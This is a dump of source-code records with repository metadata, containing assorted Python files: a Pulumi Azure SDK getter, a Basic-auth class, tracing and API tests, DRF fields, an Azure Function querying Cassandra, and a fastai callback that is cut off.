hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ace064cea5a25236c91dcf69db85fe736dec030b | 5,718 | py | Python | sdk/python/pulumi_azure_native/cache/v20210201preview/get_private_endpoint_connection.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/cache/v20210201preview/get_private_endpoint_connection.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/cache/v20210201preview/get_private_endpoint_connection.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetPrivateEndpointConnectionResult',
'AwaitableGetPrivateEndpointConnectionResult',
'get_private_endpoint_connection',
]
@pulumi.output_type
class GetPrivateEndpointConnectionResult:
    """
    The Private Endpoint Connection resource.
    """
    # NOTE: generated by the Pulumi SDK Generator. The @pulumi.output_type
    # decorator rewires attribute access to the values registered via
    # pulumi.set(), which is why __init__ stores fields with pulumi.set()
    # instead of plain attribute assignment.
    def __init__(__self__, id=None, name=None, private_endpoint=None, private_link_service_connection_state=None, provisioning_state=None, type=None):
        # Each argument is type-checked only when truthy: falsy values
        # (None, "") skip the isinstance() guard and are stored as-is.
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)
        if private_endpoint and not isinstance(private_endpoint, dict):
            raise TypeError("Expected argument 'private_endpoint' to be a dict")
        pulumi.set(__self__, "private_endpoint", private_endpoint)
        if private_link_service_connection_state and not isinstance(private_link_service_connection_state, dict):
            raise TypeError("Expected argument 'private_link_service_connection_state' to be a dict")
        pulumi.set(__self__, "private_link_service_connection_state", private_link_service_connection_state)
        if provisioning_state and not isinstance(provisioning_state, str):
            raise TypeError("Expected argument 'provisioning_state' to be a str")
        pulumi.set(__self__, "provisioning_state", provisioning_state)
        if type and not isinstance(type, str):
            raise TypeError("Expected argument 'type' to be a str")
        pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def name(self) -> str:
        """
        The name of the resource
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="privateEndpoint")
    def private_endpoint(self) -> Optional['outputs.PrivateEndpointResponse']:
        """
        The resource of private end point.
        """
        return pulumi.get(self, "private_endpoint")

    @property
    @pulumi.getter(name="privateLinkServiceConnectionState")
    def private_link_service_connection_state(self) -> 'outputs.PrivateLinkServiceConnectionStateResponse':
        """
        A collection of information about the state of the connection between service consumer and provider.
        """
        return pulumi.get(self, "private_link_service_connection_state")

    @property
    @pulumi.getter(name="provisioningState")
    def provisioning_state(self) -> str:
        """
        The provisioning state of the private endpoint connection resource.
        """
        return pulumi.get(self, "provisioning_state")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
        """
        return pulumi.get(self, "type")
class AwaitableGetPrivateEndpointConnectionResult(GetPrivateEndpointConnectionResult):
    # pylint: disable=using-constant-test
    def __await__(self):
        # Awaitable shim: the unreachable `yield` turns __await__ into a
        # generator function (required by the await protocol) without ever
        # actually yielding, so `await result` returns a plain
        # GetPrivateEndpointConnectionResult immediately.
        if False:
            yield self
        return GetPrivateEndpointConnectionResult(
            id=self.id,
            name=self.name,
            private_endpoint=self.private_endpoint,
            private_link_service_connection_state=self.private_link_service_connection_state,
            provisioning_state=self.provisioning_state,
            type=self.type)
def get_private_endpoint_connection(cluster_name: Optional[str] = None,
                                    private_endpoint_connection_name: Optional[str] = None,
                                    resource_group_name: Optional[str] = None,
                                    opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPrivateEndpointConnectionResult:
    """
    The Private Endpoint Connection resource.

    :param str cluster_name: The name of the RedisEnterprise cluster.
    :param str private_endpoint_connection_name: The name of the private endpoint connection associated with the Azure resource
    :param str resource_group_name: The name of the resource group. The name is case insensitive.
    """
    # Build the invoke arguments with the wire-format (camelCase) key names.
    __args__ = dict()
    __args__['clusterName'] = cluster_name
    __args__['privateEndpointConnectionName'] = private_endpoint_connection_name
    __args__['resourceGroupName'] = resource_group_name
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        # NOTE(review): this mutates a caller-supplied InvokeOptions in
        # place — standard for generated Pulumi SDKs; confirm before changing.
        opts.version = _utilities.get_version()
    __ret__ = pulumi.runtime.invoke('azure-native:cache/v20210201preview:getPrivateEndpointConnection', __args__, opts=opts, typ=GetPrivateEndpointConnectionResult).value
    return AwaitableGetPrivateEndpointConnectionResult(
        id=__ret__.id,
        name=__ret__.name,
        private_endpoint=__ret__.private_endpoint,
        private_link_service_connection_state=__ret__.private_link_service_connection_state,
        provisioning_state=__ret__.provisioning_state,
        type=__ret__.type)
| 42.355556 | 193 | 0.698846 |
ace064d93eb4797c1abcbd46b84ff21988659dbf | 2,780 | py | Python | 0x07-Session_authentication/api/v1/auth/basic_auth.py | JoseAVallejo12/holbertonschool-web_back_end | eb514784772352b8e4873d1f648726815ab69592 | [
"MIT"
] | null | null | null | 0x07-Session_authentication/api/v1/auth/basic_auth.py | JoseAVallejo12/holbertonschool-web_back_end | eb514784772352b8e4873d1f648726815ab69592 | [
"MIT"
] | null | null | null | 0x07-Session_authentication/api/v1/auth/basic_auth.py | JoseAVallejo12/holbertonschool-web_back_end | eb514784772352b8e4873d1f648726815ab69592 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Auth class for the app."""
from typing import Tuple, TypeVar
from api.v1.auth.auth import Auth
from models.user import User
import base64
import uuid
class BasicAuth(Auth):
    """Basic Auth class.

    Implements HTTP Basic authentication: extracts the base64 token from the
    Authorization header, decodes it into email/password credentials and
    resolves them to a User object.
    """
    def extract_base64_authorization_header(self,
                                            authorization_header: str) -> str:
        """Extract_base64_authorization_header.

        Returns the base64 token that follows the "Basic " scheme prefix,
        or None when the header is missing/malformed.
        """
        if (self.__isInValid(authorization_header)
                or not authorization_header.startswith('Basic ')):
            return None
        # startswith('Basic ') guarantees at least one space, so index 1
        # always exists; lstrip tolerates extra padding spaces.
        return authorization_header.split(' ')[1].lstrip()

    def decode_base64_authorization_header(self,
                                           base64_authorization_header: str
                                           ) -> str:
        """Decode_base64_authorization_header.

        Decodes the base64 token to a UTF-8 string, returning None on any
        decoding failure (invalid base64 or invalid UTF-8).
        """
        if self.__isInValid(base64_authorization_header):
            return None
        try:
            return base64.b64decode(
                base64_authorization_header).decode("utf-8")
        except Exception:
            return None

    def extract_user_credentials(self,
                                 decoded_base64_authorization_header: str
                                 ) -> Tuple[str, str]:
        """Extract_user_credentials.

        Splits "email:password" on the FIRST colon only, so passwords may
        contain colons. Returns (None, None) on malformed input.
        """
        if (self.__isInValid(decoded_base64_authorization_header)
                or decoded_base64_authorization_header.count(':') == 0):
            return (None, None)
        headers = decoded_base64_authorization_header.split(':', 1)
        # NOTE(review): lstrip() also trims leading whitespace from the
        # password; RFC 7617 allows passwords that start with a space —
        # confirm this trimming is intended before changing.
        return (headers[0].lstrip(), headers[1].lstrip())

    def user_object_from_credentials(self, user_email: str,
                                     user_pwd: str) -> TypeVar('User'):
        """User_object_from_credentials.

        Looks up users by email and returns the first one whose password
        matches, or None when no match is found.
        """
        if self.__isInValid(user_email) or self.__isInValid(user_pwd):
            return None
        user = User()
        user.load_from_file()
        users = []
        for item in user.search({'email': user_email}):
            if item.is_valid_password(user_pwd):
                users.append(item)
        return users[0] if len(users) > 0 else None

    def __isInValid(self, parametter: str) -> bool:
        """Validate arg commin to function.

        True when the parameter is absent or not a string (i.e. invalid).
        """
        if (parametter is None or not isinstance(parametter, str)):
            return True
        return False

    def current_user(self, request) -> TypeVar('User'):
        """Overload method in base Auth class.

        Full pipeline: header -> base64 token -> decoded credentials ->
        User object; each stage tolerates None from the previous one.
        """
        user_data = self.authorization_header(request)
        user_email, user_password = self.extract_user_credentials(
            self.decode_base64_authorization_header(
                self.extract_base64_authorization_header(user_data)
            ))
        return self.user_object_from_credentials(user_email, user_password)
| 38.082192 | 78 | 0.601799 |
ace0652d238f78dfd23749e10757e4b4aac84673 | 1,350 | py | Python | tests/test_listener_per_request/test_asyncio.py | opentracing-contrib/python-examples | c1a3f619ed7c1f20813ac6dd5da198ddbfc5ade0 | [
"Apache-2.0"
] | 5 | 2017-10-13T22:55:55.000Z | 2020-08-19T22:23:49.000Z | tests/test_listener_per_request/test_asyncio.py | opentracing-contrib/python-examples | c1a3f619ed7c1f20813ac6dd5da198ddbfc5ade0 | [
"Apache-2.0"
] | null | null | null | tests/test_listener_per_request/test_asyncio.py | opentracing-contrib/python-examples | c1a3f619ed7c1f20813ac6dd5da198ddbfc5ade0 | [
"Apache-2.0"
] | 2 | 2018-03-21T10:13:22.000Z | 2021-04-05T10:36:32.000Z | from __future__ import print_function
import asyncio
from opentracing.ext import tags
from mocktracer import MockTracer
from ..span_propagation import AsyncioScopeManager
from ..testcase import OpenTracingTestCase
from ..utils import get_one_by_tag
from .response_listener import ResponseListener
class Client(object):
    """Toy client that performs a fake RPC on an asyncio event loop."""

    def __init__(self, tracer, loop):
        self.loop = loop
        self.tracer = tracer

    async def task(self, message, listener):
        # Produce the canned response and notify the listener (which is
        # expected to finish the span it owns).
        response = '%s::response' % message
        listener.on_response(response)
        return response

    def send_sync(self, message):
        """Send *message* synchronously, tracing it as a client-kind span."""
        outgoing_span = self.tracer.start_span('send')
        outgoing_span.set_tag(tags.SPAN_KIND, tags.SPAN_KIND_RPC_CLIENT)
        response_listener = ResponseListener(outgoing_span)
        pending = self.task(message, response_listener)
        return self.loop.run_until_complete(pending)
class TestThreads(OpenTracingTestCase):
    """One synchronous send must record exactly one client-kind span."""

    def setUp(self):
        self.tracer = MockTracer(AsyncioScopeManager())
        self.loop = asyncio.get_event_loop()

    def test_main(self):
        client = Client(self.tracer, self.loop)
        res = client.send_sync('message')
        # assertEquals is a deprecated alias of assertEqual and was removed
        # in Python 3.12; use the canonical name.
        self.assertEqual(res, 'message::response')
        spans = self.tracer.finished_spans()
        self.assertEqual(len(spans), 1)
        span = get_one_by_tag(spans, tags.SPAN_KIND, tags.SPAN_KIND_RPC_CLIENT)
        self.assertIsNotNone(span)
| 28.723404 | 79 | 0.702222 |
ace065f7d79bef54c499ad393ac49ef3f7ab2294 | 2,776 | py | Python | tests/test_api_endpoints/test_report_endpoints.py | andreasCastor/castoredc_api | ef0bd4eb8ac2efaa7e98e8462de7e5a7aa65a7f0 | [
"MIT"
] | null | null | null | tests/test_api_endpoints/test_report_endpoints.py | andreasCastor/castoredc_api | ef0bd4eb8ac2efaa7e98e8462de7e5a7aa65a7f0 | [
"MIT"
] | null | null | null | tests/test_api_endpoints/test_report_endpoints.py | andreasCastor/castoredc_api | ef0bd4eb8ac2efaa7e98e8462de7e5a7aa65a7f0 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Testing class for report endpoints of the Castor EDC API Wrapper.
Link: https://data.castoredc.com/api#/report
@author: R.C.A. van Linschoten
https://orcid.org/0000-0003-3052-596X
"""
import pytest
from tests.test_api_endpoints.data_models import report_model
from castoredc_api_client import CastorException
class TestReport:
    """Tests for the Castor EDC report endpoints."""

    model_keys = report_model.keys()
    test_report = {
        "id": "770DB401-6100-4CF5-A95F-3402B55EAC48",
        "report_id": "770DB401-6100-4CF5-A95F-3402B55EAC48",
        "name": "Comorbidities",
        "description": "",
        "type": "other",
        "_links": {
            "self": {
                "href": "https://data.castoredc.com/api/study/D234215B-D956-482D-BF17-71F2BB12A2FD/report/770DB401-6100-4CF5-A95F-3402B55EAC48"
            }
        },
    }

    @pytest.fixture(scope="class")
    def all_reports(self, client):
        """Gets all reports from the study."""
        return client.all_reports()

    def test_all_reports(self, all_reports, item_totals):
        """Tests if all reports are returned from the study."""
        assert len(all_reports) > 0, "No reports found in the study, is this right?"
        assert len(all_reports) == item_totals("/report")

    def test_all_reports_model(self, all_reports):
        """Tests if all_reports returns the right model."""
        for report in all_reports:
            api_keys = report.keys()
            # Same number of fields as the reference model ...
            assert len(api_keys) == len(self.model_keys)
            # ... and every field present with a value of the expected type.
            for key in self.model_keys:
                assert key in api_keys
                assert type(report[key]) in report_model[key]

    def test_all_reports_data(self, all_reports):
        """Tests the data of the reports returned by all_reports"""
        # Pick out the known report by id and compare it field-for-field.
        matches = (
            report
            for report in all_reports
            if report["report_id"] == "770DB401-6100-4CF5-A95F-3402B55EAC48"
        )
        report = next(matches, None)
        assert report == self.test_report

    def test_single_report_success(self, client):
        """Tests if single report returns the proper data."""
        report = client.single_report("770DB401-6100-4CF5-A95F-3402B55EAC48")
        assert report == self.test_report

    def test_single_report_failure(self, client):
        """Tests if single report returns an error."""
        with pytest.raises(CastorException) as e:
            client.single_report("FAKEB401-6100-4CF5-A95F-3402B55EAC48")
        assert str(e.value) == "404 Entity not found."
| 36.051948 | 143 | 0.626441 |
ace0667a9ab976d3e2b8304102f7f023834fa01c | 3,512 | py | Python | awx/api/fields.py | Avinesh/awx | 6310a2edd890d6062a9f6bcdeb2b46c4b876c2bf | [
"Apache-2.0"
] | 17 | 2021-04-03T01:40:17.000Z | 2022-03-03T11:45:20.000Z | awx/api/fields.py | Avinesh/awx | 6310a2edd890d6062a9f6bcdeb2b46c4b876c2bf | [
"Apache-2.0"
] | 24 | 2021-05-18T21:13:35.000Z | 2022-03-29T10:23:52.000Z | awx/api/fields.py | hostinger/awx | dac01b14e2c04c201a162ea03ef8386d822e3923 | [
"Apache-2.0"
] | 24 | 2020-11-27T08:37:35.000Z | 2021-03-08T13:27:15.000Z | # Copyright (c) 2016 Ansible, Inc.
# All Rights Reserved.
# Django
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ObjectDoesNotExist
# Django REST Framework
from rest_framework import serializers
# AWX
from awx.conf import fields
from awx.main.models import Credential
__all__ = ['BooleanNullField', 'CharNullField', 'ChoiceNullField', 'VerbatimField']
class NullFieldMixin(object):
    '''
    Mixin to prevent shortcutting validation when we want to allow null input,
    but coerce the resulting value to another type.
    '''

    def validate_empty_values(self, data):
        # Let DRF classify the value first, but refuse to short-circuit on
        # an explicit null so the field can still coerce None itself.
        is_empty, value = super(NullFieldMixin, self).validate_empty_values(data)
        if is_empty and value is None:
            is_empty = False
        return (is_empty, value)
class BooleanNullField(NullFieldMixin, serializers.NullBooleanField):
    '''
    Custom boolean field that allows null and empty string as False values.
    '''

    def to_internal_value(self, data):
        # Coerce whatever the parent produced (True/False/None) to bool,
        # so null becomes False.
        value = super(BooleanNullField, self).to_internal_value(data)
        return bool(value)
class CharNullField(NullFieldMixin, serializers.CharField):
    '''
    Custom char field that allows null as input and coerces to an empty string.
    '''

    def __init__(self, **kwargs):
        kwargs['allow_null'] = True
        super(CharNullField, self).__init__(**kwargs)

    def to_internal_value(self, data):
        # Treat null (and any other falsy input) as the empty string.
        if not data:
            data = u''
        return super(CharNullField, self).to_internal_value(data)
class ChoiceNullField(NullFieldMixin, serializers.ChoiceField):
    '''
    Custom choice field that allows null as input and coerces to an empty string.
    '''

    def __init__(self, **kwargs):
        kwargs['allow_null'] = True
        super(ChoiceNullField, self).__init__(**kwargs)

    def to_internal_value(self, data):
        # Treat null (and any other falsy input) as the empty string.
        if not data:
            data = u''
        return super(ChoiceNullField, self).to_internal_value(data)
class VerbatimField(serializers.Field):
    '''
    Custom field that passes the value through without changes.
    '''

    def to_internal_value(self, data):
        # Identity: accept the incoming value as-is, no coercion/validation.
        return data

    def to_representation(self, value):
        # Identity: serialize the stored value unchanged.
        return value
class OAuth2ProviderField(fields.DictField):
    """Dict field holding OAuth2 provider timeouts; only a fixed set of
    setting names is accepted and every value must be a positive integer."""

    default_error_messages = {
        'invalid_key_names': _('Invalid key names: {invalid_key_names}'),
    }
    valid_key_names = {'ACCESS_TOKEN_EXPIRE_SECONDS', 'AUTHORIZATION_CODE_EXPIRE_SECONDS', 'REFRESH_TOKEN_EXPIRE_SECONDS'}
    child = fields.IntegerField(min_value=1)

    def to_internal_value(self, data):
        data = super(OAuth2ProviderField, self).to_internal_value(data)
        # Reject any key outside the allowed set.
        unknown = set(data.keys()) - self.valid_key_names
        if unknown:
            self.fail('invalid_key_names', invalid_key_names=', '.join(list(unknown)))
        return data
class DeprecatedCredentialField(serializers.IntegerField):
    """Nullable credential-pk field kept only for backwards compatibility."""

    def __init__(self, **kwargs):
        # Force the legacy behaviour: optional, defaulting to null, with a
        # positive primary key when supplied.
        kwargs['min_value'] = 1
        kwargs['default'] = None
        kwargs['allow_null'] = True
        kwargs.setdefault('help_text', 'This resource has been deprecated and will be removed in a future release')
        super(DeprecatedCredentialField, self).__init__(**kwargs)

    def to_internal_value(self, pk):
        try:
            pk = int(pk)
        except ValueError:
            self.fail('invalid')
        # The referenced credential must actually exist.
        try:
            Credential.objects.get(pk=pk)
        except ObjectDoesNotExist:
            raise serializers.ValidationError(_('Credential {} does not exist').format(pk))
        return pk
| 31.079646 | 122 | 0.693907 |
ace0679015a6110ab4df4fd1b5b13a71578e80bb | 1,772 | py | Python | service/__init__.py | LiuYuWei/azure-function-cassandra-blob | ebb9eb0500abd46847d4e0ba49d2e73ed7d0493e | [
"Apache-2.0"
] | null | null | null | service/__init__.py | LiuYuWei/azure-function-cassandra-blob | ebb9eb0500abd46847d4e0ba49d2e73ed7d0493e | [
"Apache-2.0"
] | 1 | 2020-02-15T01:16:01.000Z | 2020-02-15T01:16:01.000Z | service/__init__.py | LiuYuWei/azure-function-cassandra-blob | ebb9eb0500abd46847d4e0ba49d2e73ed7d0493e | [
"Apache-2.0"
] | null | null | null | import os
import sys
try:
sys.path.append(os.environ['PROJECT_PATH'])
except:
print('please add PROJECT_PATH to your environment')
sys.exit(1)
import json
import logging
import azure.functions as func
from service.function_http_request import FunctionHttpRequest
from config.config_setting import ConfigSetting
from src.dao.cassandra_dao import CassandraDao
from src.dao.azure_blob_dao import AzureBlobService
def main(req: func.HttpRequest) -> func.HttpResponse:
    """HTTP-triggered entry point.

    Runs the requested Cassandra query and returns the rows as JSON; when
    blob_store == "True" the result is also written to Azure Blob storage
    as CSV and a download URL is included in the response.
    """
    url_text = "None"
    config_setting = ConfigSetting()
    log = config_setting.set_logger("[ azure_function ]", os.path.join("tmp/", "logs"))
    log.info('Python HTTP trigger function processed a request.')
    function_http_request = FunctionHttpRequest(req)
    query_text = function_http_request.get_request_value('query_text')
    blob_store = function_http_request.get_request_value('blob_store')
    # Validate the required parameter BEFORE doing any database work —
    # previously the Cassandra query ran first and a missing query_text
    # crashed inside get_query_data() instead of returning 400.
    if not query_text:
        return func.HttpResponse(
            "Please pass a name on the query string or in the request body",
            status_code=400
        )
    cassandra_dao = CassandraDao()
    cassandra_dao.connection_setting()
    df = cassandra_dao.get_query_data(query_text)
    log.info(blob_store)
    # blob_store arrives as a request string, hence the comparison to "True".
    if blob_store == "True":
        log.info("存到azure blob中")
        output_csv_file = df.to_csv(index_label="idx", encoding="utf-8")
        azure_blob_service = AzureBlobService()
        azure_blob_service.connection_setting()
        azure_blob_service.create_file_on_blob(output_csv_file)
        url_text = azure_blob_service.url_download_generate()
    df_json = df.to_json(orient='records', default_handler=str)
    json_text = json.dumps({"url": url_text, "data": df_json})
    return func.HttpResponse(json_text)
| 32.814815 | 87 | 0.720655 |
ace06818dd0258b58f5cd8e2d0f16711817f75f3 | 1,093 | py | Python | scourgify/tests/test_cleaning.py | yuskey/usaddress-scourgify | 3cf4b953017433a071b523235a90c74348b245cc | [
"MIT"
] | 116 | 2018-07-17T18:55:33.000Z | 2022-03-04T19:11:12.000Z | scourgify/tests/test_cleaning.py | yuskey/usaddress-scourgify | 3cf4b953017433a071b523235a90c74348b245cc | [
"MIT"
] | 14 | 2018-10-27T21:45:55.000Z | 2022-02-17T15:57:00.000Z | scourgify/tests/test_cleaning.py | yuskey/usaddress-scourgify | 3cf4b953017433a071b523235a90c74348b245cc | [
"MIT"
] | 28 | 2018-09-05T13:00:42.000Z | 2022-01-21T17:04:09.000Z | #!/usr/bin/env python
# encoding: utf-8
"""
copyright (c) 2016-2019 Earth Advantage.
All rights reserved
"""
# Imports from Standard Library
from unittest import TestCase
# Local Imports
from scourgify.cleaning import strip_occupancy_type
class CleaningTests(TestCase):
    def test_strip_occupancy_type(self):
        """Occupancy designators (Unit, Apartment, UN, #...) are stripped,
        leaving only the occupancy identifier."""
        expected = '33'
        samples = (
            'Unit 33',
            'Apartment 33',
            'Unit #33',
            'Building 3 Unit 33',
            'Building 3 UN 33',
            '33',
        )
        for line2 in samples:
            result = strip_occupancy_type(line2)
            self.assertEqual(result, expected)
| 25.418605 | 52 | 0.638609 |
ace068fba581fb7378328215ee312fa7567e9b66 | 767 | py | Python | pyefun/processPoolUtil_test.py | 1431241631/pyefun | ac2290d4bcc8de16c195d2782f3eacd26e5e6ed4 | [
"Apache-2.0"
] | 1 | 2021-08-23T07:48:17.000Z | 2021-08-23T07:48:17.000Z | pyefun/processPoolUtil_test.py | 1431241631/pyefun | ac2290d4bcc8de16c195d2782f3eacd26e5e6ed4 | [
"Apache-2.0"
] | null | null | null | pyefun/processPoolUtil_test.py | 1431241631/pyefun | ac2290d4bcc8de16c195d2782f3eacd26e5e6ed4 | [
"Apache-2.0"
] | null | null | null | import unittest
from .processPoolUtil import *
from .__init__ import *
class TestProcessPoolUtil(unittest.TestCase):
    """Smoke tests for the process-pool helpers."""

    def test_1(self):
        # Submit ten tasks to a 4-worker pool and collect their results.
        def 任务函数(参数):
            print("任务函数", 参数)
            return 参数

        任务池 = 进程池(4)
        result = []
        for url in range(10):
            task = 任务池.投递任务(任务函数, (url))
            result.append(task)
        延时(2)
        for res in result:
            try:
                data = 任务池.进程池_取返回值(res)
                print(data)
            except Exception:
                # A bare ``except:`` would also swallow SystemExit and
                # KeyboardInterrupt; catch Exception instead.
                print("出错了")
        任务池.进程池_停止添加子进程()
        任务池.进程池_终止所有子进程()

    def test_2(self):
        # Create, start and join a single worker process.
        def 任务函数(参数):
            print("任务函数", 参数)
            return 参数

        x = 进程_创建(任务函数)
        x.进程_启动()
        x.进程_等待进程()
| 17.431818 | 45 | 0.466754 |
ace069df45d959f6a9d360f5d855478342a9cddc | 235 | py | Python | examples/botnet/hellobot/hello-bm.py | dasec/ForTrace | b8187522a2c83fb661e5a1a5f403da8f40a31ead | [
"MIT"
] | 1 | 2022-03-31T14:01:51.000Z | 2022-03-31T14:01:51.000Z | examples/botnet/hellobot/hello-bm.py | dasec/ForTrace | b8187522a2c83fb661e5a1a5f403da8f40a31ead | [
"MIT"
] | null | null | null | examples/botnet/hellobot/hello-bm.py | dasec/ForTrace | b8187522a2c83fb661e5a1a5f403da8f40a31ead | [
"MIT"
] | 1 | 2022-03-31T14:02:30.000Z | 2022-03-31T14:02:30.000Z | from __future__ import absolute_import
from fortrace.botnet.bots.hellobot.hello_bot import HelloBotMaster
from six.moves import input
__author__ = 'Sascha Kopp'
b = HelloBotMaster()
b.start()
input("press enter to exit:\n")
b.stop()
| 21.363636 | 66 | 0.787234 |
ace06b077719e7892e27a70d070ad4e697428834 | 6,247 | py | Python | tsai/callback/PredictionDynamics.py | mvccn/tsai | 94207d69d8a1531b5847b76a2b453296d9b8042d | [
"Apache-2.0"
] | 1 | 2021-09-16T04:35:38.000Z | 2021-09-16T04:35:38.000Z | tsai/callback/PredictionDynamics.py | mvccn/tsai | 94207d69d8a1531b5847b76a2b453296d9b8042d | [
"Apache-2.0"
] | 1 | 2021-12-21T12:13:59.000Z | 2021-12-21T12:13:59.000Z | tsai/callback/PredictionDynamics.py | mvccn/tsai | 94207d69d8a1531b5847b76a2b453296d9b8042d | [
"Apache-2.0"
] | 1 | 2021-08-12T20:45:07.000Z | 2021-08-12T20:45:07.000Z | # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/064_callback.PredictionDynamics.ipynb (unless otherwise specified).
__all__ = ['PredictionDynamics']
# Cell
from fastai.callback.all import *
from ..imports import *
# Cell
class PredictionDynamics(Callback):
    # Runs after most other callbacks (order 65) and only during validation.
    order, run_valid = 65, True

    def __init__(self, show_perc=1., figsize=(6, 6), alpha=.3, size=30, color='lime', cmap='gist_rainbow'):
        """
        Args:
            show_perc: percent of samples from the valid set that will be displayed. Default: 1 (all).
                You can reduce it if the number is too high and the chart is too busy.
            alpha: level of transparency. Default:.3. 1 means no transparency.
            figsize: size of the chart. You may want to expand it if too many classes.
            size: size of each sample in the chart. Default:30. You may need to decrease it a bit if too many classes/ samples.
            color: color used in regression plots.
            cmap: color map used in classification plots.
            The red line in classification tasks indicate the average probability of true class.
        """
        store_attr("show_perc,figsize,alpha,size,color,cmap")

    def before_fit(self):
        # Skip entirely during lr_find and get_preds runs.
        self.run = not hasattr(self.learn, 'lr_finder') and not hasattr(self, "gather_preds")
        if not self.run:
            return
        # Classification when the dataloaders declare more than one class,
        # otherwise treated as regression.
        self.cat = True if (hasattr(self.dls, "c") and self.dls.c > 1) else False
        if self.show_perc != 1:
            # Fixed random subsample of the validation set, chosen once so
            # the same points are tracked across epochs.
            valid_size = len(self.dls.valid.dataset)
            self.show_idxs = np.random.choice(valid_size, int(round(self.show_perc * valid_size)), replace=False)
        # Prepare ground truth container
        self.y_true = []

    def before_epoch(self):
        # Prepare empty pred container in every epoch
        self.y_pred = []

    def after_pred(self):
        if self.training:
            return
        # Get y_true in epoch 0 (targets don't change between epochs).
        if self.epoch == 0:
            self.y_true.extend(self.y.cpu().flatten().numpy())
        # Gather y_pred for every batch
        if self.cat:
            # Probability assigned to the TRUE class for each sample.
            y_pred = torch.gather(F.softmax(self.pred.detach().cpu(), 1), -1, self.y.cpu().reshape(-1, 1).long())
        else:
            y_pred = self.pred.detach().cpu()
        self.y_pred.extend(y_pred.flatten().numpy())

    def after_epoch(self):
        # Ground truth (finalized once, after the first validation pass).
        if self.epoch == 0:
            self.y_true = np.array(self.y_true)
            if self.show_perc != 1:
                self.y_true = self.y_true[self.show_idxs]
            self.y_bounds = (np.min(self.y_true), np.max(self.y_true))
            self.min_x_bounds, self.max_x_bounds = np.min(self.y_true), np.max(self.y_true)
        self.y_pred = np.array(self.y_pred)
        if self.show_perc != 1:
            self.y_pred = self.y_pred[self.show_idxs]
        if self.cat:
            self.update_graph(self.y_pred, self.y_true)
        else:
            # Adjust bounds during validation so the regression axes only
            # ever grow and the chart stays comparable across epochs.
            self.min_x_bounds = min(self.min_x_bounds, np.min(self.y_pred))
            self.max_x_bounds = max(self.max_x_bounds, np.max(self.y_pred))
            x_bounds = (self.min_x_bounds, self.max_x_bounds)
            self.update_graph(self.y_pred, self.y_true, x_bounds=x_bounds, y_bounds=self.y_bounds)

    def after_fit(self):
        # Release the figure so notebooks don't keep a duplicate plot alive.
        plt.close(self.graph_ax.figure)

    def update_graph(self, y_pred, y_true, x_bounds=None, y_bounds=None):
        # Lazy, one-time setup of the figure and per-class plotting state
        # (colors, jitter, horizontal separators).
        if not hasattr(self, 'graph_fig'):
            self.df_out = display("", display_id=True)
            if self.cat:
                self._cl_names = self.dls.vocab
                self._classes = L(self.dls.vocab.o2i.values())
                self._n_classes = len(self._classes)
                self._h_vals = np.linspace(-.5, self._n_classes - .5, self._n_classes + 1)[::-1]
                _cm = plt.get_cmap(self.cmap)
                self._color = [_cm(1. * c/self._n_classes) for c in range(1, self._n_classes + 1)][::-1]
                # Fixed vertical jitter per class so each sample keeps its
                # position between epochs.
                self._rand = []
                for i, c in enumerate(self._classes):
                    self._rand.append(.5 * (np.random.rand(np.sum(y_true == c)) - .5))
            self.graph_fig, self.graph_ax = plt.subplots(1, figsize=self.figsize)
            self.graph_out = display("", display_id=True)
        self.graph_ax.clear()
        if self.cat:
            # One jittered scatter row per class; the red vline marks the
